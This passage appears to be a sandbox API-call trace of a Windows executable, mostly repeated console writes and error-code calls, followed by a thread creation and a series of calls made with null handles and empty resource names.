WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.256] GetLastError () returned 0x0 [0219.256] SetLastError (dwErrCode=0x0) [0219.256] GetLastError () returned 0x0 [0219.256] SetLastError (dwErrCode=0x0) [0219.256] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0219.257] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0219.258] GetLastError () returned 0x0 [0219.258] SetLastError (dwErrCode=0x0) [0219.258] GetLastError () returned 0x0 [0219.258] SetLastError (dwErrCode=0x0) [0219.258] GetLastError () returned 0x0 [0219.258] SetLastError (dwErrCode=0x0) [0219.258] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0219.258] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0219.259] GetLastError () returned 0x0 [0219.259] SetLastError (dwErrCode=0x0) [0219.259] GetLastError () returned 0x0 [0219.259] SetLastError (dwErrCode=0x0) [0219.259] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.260] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.260] GetLastError () returned 0x0 [0219.260] SetLastError (dwErrCode=0x0) [0219.260] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.261] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.261] GetLastError () returned 0x0 [0219.261] SetLastError (dwErrCode=0x0) [0219.262] GetLastError () returned 0x0 [0219.262] SetLastError (dwErrCode=0x0) [0219.262] GetLastError () returned 0x0 [0219.262] SetLastError (dwErrCode=0x0) [0219.262] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.263] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.263] GetLastError () returned 0x0 [0219.263] SetLastError (dwErrCode=0x0) [0219.263] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.264] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.264] GetLastError () returned 0x0 [0219.264] SetLastError (dwErrCode=0x0) [0219.264] GetLastError () returned 0x0 [0219.265] SetLastError (dwErrCode=0x0) [0219.265] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.265] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.266] GetLastError () returned 0x0 [0219.266] SetLastError (dwErrCode=0x0) [0219.266] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.266] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.267] GetLastError () returned 0x0 [0219.267] SetLastError (dwErrCode=0x0) [0219.267] GetLastError () returned 0x0 [0219.267] SetLastError (dwErrCode=0x0) [0219.267] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0219.267] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0219.268] GetLastError () returned 0x0 [0219.268] SetLastError (dwErrCode=0x0) [0219.268] GetLastError () returned 0x0 [0219.268] SetLastError (dwErrCode=0x0) [0219.268] GetLastError () returned 0x0 [0219.268] SetLastError (dwErrCode=0x0) [0219.268] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0219.269] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0219.269] GetLastError () returned 0x0 [0219.269] SetLastError (dwErrCode=0x0) [0219.270] GetLastError () returned 0x0 [0219.270] SetLastError (dwErrCode=0x0) [0219.270] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.270] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.271] GetLastError () returned 0x0 [0219.271] SetLastError (dwErrCode=0x0) [0219.271] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.271] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.272] GetLastError () returned 0x0 [0219.272] SetLastError (dwErrCode=0x0) [0219.272] GetLastError () returned 0x0 [0219.272] SetLastError (dwErrCode=0x0) [0219.272] GetLastError () returned 0x0 [0219.272] SetLastError (dwErrCode=0x0) [0219.272] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.273] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.273] GetLastError () returned 0x0 [0219.273] SetLastError (dwErrCode=0x0) [0219.273] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.274] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.275] GetLastError () returned 0x0 [0219.275] SetLastError (dwErrCode=0x0) [0219.275] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.275] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.276] GetLastError () returned 0x0 [0219.276] SetLastError (dwErrCode=0x0) [0219.276] GetLastError () returned 0x0 [0219.276] SetLastError (dwErrCode=0x0) [0219.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.276] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.277] GetLastError () returned 0x0 [0219.277] SetLastError (dwErrCode=0x0) [0219.277] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.278] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.281] GetLastError () returned 0x0 [0219.281] SetLastError (dwErrCode=0x0) [0219.281] GetLastError () returned 0x0 [0219.281] SetLastError (dwErrCode=0x0) [0219.281] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0219.281] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0219.282] GetLastError () returned 0x0 [0219.282] SetLastError (dwErrCode=0x0) [0219.282] GetLastError () returned 0x0 [0219.282] SetLastError (dwErrCode=0x0) [0219.282] GetLastError () returned 0x0 [0219.282] SetLastError (dwErrCode=0x0) [0219.282] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0219.283] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0219.284] GetLastError () returned 0x0 [0219.284] SetLastError (dwErrCode=0x0) [0219.284] GetLastError () returned 0x0 [0219.284] SetLastError (dwErrCode=0x0) [0219.284] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.284] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.285] GetLastError () returned 0x0 [0219.285] SetLastError (dwErrCode=0x0) [0219.285] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.285] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.286] GetLastError () returned 0x0 [0219.286] SetLastError (dwErrCode=0x0) [0219.286] GetLastError () returned 0x0 [0219.286] SetLastError (dwErrCode=0x0) [0219.286] GetLastError () returned 0x0 [0219.286] SetLastError (dwErrCode=0x0) [0219.286] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.365] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.366] GetLastError () returned 0x0 [0219.366] SetLastError (dwErrCode=0x0) [0219.366] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.367] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.367] GetLastError () returned 0x0 [0219.367] SetLastError (dwErrCode=0x0) [0219.367] GetLastError () returned 0x0 [0219.367] SetLastError (dwErrCode=0x0) [0219.367] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.368] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.368] GetLastError () returned 0x0 [0219.368] SetLastError (dwErrCode=0x0) [0219.368] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.368] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.369] GetLastError () returned 0x0 [0219.369] SetLastError (dwErrCode=0x0) [0219.369] GetLastError () returned 0x0 [0219.369] SetLastError (dwErrCode=0x0) [0219.369] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0219.369] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0219.370] GetLastError () returned 0x0 [0219.370] SetLastError (dwErrCode=0x0) [0219.370] GetLastError () returned 0x0 [0219.370] SetLastError (dwErrCode=0x0) [0219.370] GetLastError () returned 0x0 [0219.370] SetLastError (dwErrCode=0x0) [0219.370] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0219.371] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0219.371] GetLastError () returned 0x0 [0219.371] SetLastError (dwErrCode=0x0) [0219.371] GetLastError () returned 0x0 [0219.371] SetLastError (dwErrCode=0x0) [0219.371] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.372] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.372] GetLastError () returned 0x0 [0219.372] SetLastError (dwErrCode=0x0) [0219.373] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.373] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.373] GetLastError () returned 0x0 [0219.373] SetLastError (dwErrCode=0x0) [0219.374] GetLastError () returned 0x0 [0219.374] SetLastError (dwErrCode=0x0) [0219.374] GetLastError () returned 0x0 [0219.374] SetLastError (dwErrCode=0x0) [0219.374] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.374] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.375] GetLastError () returned 0x0 [0219.375] SetLastError (dwErrCode=0x0) [0219.375] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.375] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.375] GetLastError () returned 0x0 [0219.376] SetLastError (dwErrCode=0x0) [0219.376] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.376] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.377] GetLastError () returned 0x0 [0219.377] SetLastError (dwErrCode=0x0) [0219.377] GetLastError () returned 0x0 [0219.377] SetLastError (dwErrCode=0x0) [0219.377] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.377] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.378] GetLastError () returned 0x0 [0219.378] SetLastError (dwErrCode=0x0) [0219.378] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.378] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.379] GetLastError () returned 0x0 [0219.379] SetLastError (dwErrCode=0x0) [0219.379] GetLastError () returned 0x0 [0219.379] SetLastError (dwErrCode=0x0) [0219.379] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.379] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x2, lpOverlapped=0x0) returned 1 [0219.379] GetLastError () returned 0x0 [0219.379] SetLastError (dwErrCode=0x0) [0219.380] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0219.380] GetLastError () returned 0x0 [0219.380] SetLastError (dwErrCode=0x0) [0219.380] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.380] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.380] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0219.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41d36e, lpParameter=0x2114be8, dwCreationFlags=0x4, lpThreadId=0x2114be8 | out: lpThreadId=0x2114be8*=0x760) returned 0x1f0 [0219.380] ResumeThread (hThread=0x1f0) returned 0x1 [0219.380] GetLastError () returned 0x0 [0219.380] SetLastError (dwErrCode=0x0) [0219.380] GetLastError () returned 0x0 [0219.380] SetLastError (dwErrCode=0x0) [0219.380] GetLastError () returned 0x0 [0219.380] SetLastError (dwErrCode=0x0) [0219.381] GetLastError () returned 0x0 [0219.381] SetLastError (dwErrCode=0x0) [0219.381] GetLastError () returned 0x0 [0219.381] SetLastError (dwErrCode=0x0) [0219.381] GetLastError () returned 0x0 [0219.381] SetLastError (dwErrCode=0x0) [0219.381] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0ec | out: lpMode=0x19e0ec) returned 1 [0219.381] WriteFile (in: hFile=0x3c, lpBuffer=0x19e118*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19e0fc, lpOverlapped=0x0 | out: lpBuffer=0x19e118*, lpNumberOfBytesWritten=0x19e0fc*=0x2, lpOverlapped=0x0) returned 1 [0219.381] GetLastError () returned 0x0 [0219.381] SetLastError (dwErrCode=0x0) [0219.381] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0ec | out: lpMode=0x19e0ec) returned 1 [0219.382] WriteFile (in: hFile=0x3c, lpBuffer=0x19e118*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19e0fc, lpOverlapped=0x0 | out: lpBuffer=0x19e118*, lpNumberOfBytesWritten=0x19e0fc*=0x2, lpOverlapped=0x0) returned 1 [0219.382] GetLastError () returned 0x0 [0219.382] SetLastError (dwErrCode=0x0) Thread: id = 32 os_tid = 0x138 Thread: id = 33 os_tid = 0x2d0 Thread: id = 34 os_tid = 0x760 [0219.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.455] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0219.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.455] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0219.455] GetLastError () returned 0x0 [0219.455] SetLastError (dwErrCode=0x0) [0219.457] GetMenu (hWnd=0x0) returned 0x0 [0219.457] CheckMenuRadioItem (hmenu=0x0, first=0x10, last=0x0, check=0x125, flags=0x0) returned 0 [0219.457] DestroyWindow (hWnd=0x0) returned 0 [0219.457] GetMenu (hWnd=0x0) returned 0x0 [0219.457] CheckMenuRadioItem (hmenu=0x0, first=0x0, last=0x1, check=0x0, flags=0x0) returned 0 [0219.457] GetClientRect (in: hWnd=0x0, lpRect=0x209f340 | out: lpRect=0x209f340) returned 0 [0219.457] ScrollWindowEx (in: hWnd=0x0, dx=0, dy=0, prcScroll=0x0, prcClip=0x0, hrgnUpdate=0x0, prcUpdate=0x209f340, flags=0x6 | out: prcUpdate=0x209f340) returned 0 [0219.457] SetScrollInfo (hwnd=0x0, nBar=0, lpsi=0x209f29c, redraw=1) returned 0 [0219.784] GetClientRect (in: hWnd=0x0, lpRect=0x209f340 | out: lpRect=0x209f340) returned 0 [0219.784] ScrollWindowEx (in: hWnd=0x0, dx=0, dy=0, prcScroll=0x0, prcClip=0x0, hrgnUpdate=0x0, prcUpdate=0x209f340, flags=0x6 | out: prcUpdate=0x209f340) returned 0 [0219.784] SetScrollInfo (hwnd=0x0, nBar=1, lpsi=0x209f29c, redraw=1) returned 0 [0219.784] GetLastError () returned 0x578 [0219.784] CreateFileA (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0219.784] GetFileSize (in: hFile=0xffffffff, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xffffffff [0219.784] GlobalLock (hMem=0x0) returned 0x0 [0219.784] ReadFile (in: hFile=0xffffffff, lpBuffer=0x0, nNumberOfBytesToRead=0xffffffff, lpNumberOfBytesRead=0x209f010, lpOverlapped=0x0 | out: lpBuffer=0x0, lpNumberOfBytesRead=0x209f010*=0x0, lpOverlapped=0x0) returned 0 [0219.784] GlobalUnlock (hMem=0x0) returned 1 [0219.784] CloseHandle (hObject=0xffffffff) returned 1 [0219.785] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x209f018 | out: ppstm=0x209f018*=0x2ecdf0) returned 0x0 [0219.785] GetMessagePos () returned 0x0 [0219.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0219.786] GetFileType (hFile=0x3c) returned 0x2 [0219.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0219.786] SetConsoleScreenBufferSize (hConsoleOutput=0x3c, dwSize=0x13880050) returned 0 [0219.791] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0219.791] GetFileType (hFile=0x40) returned 0x2 [0219.792] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0219.792] GetFileType (hFile=0x38) returned 0x2 [0219.793] NetAlertRaise (AlertType=0x0, Buffer=0x0, BufferSize=0x0) returned 0x32 [0219.793] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.793] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.793] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 [0219.796] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.796] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.796] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 [0219.796] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.796] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.796] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 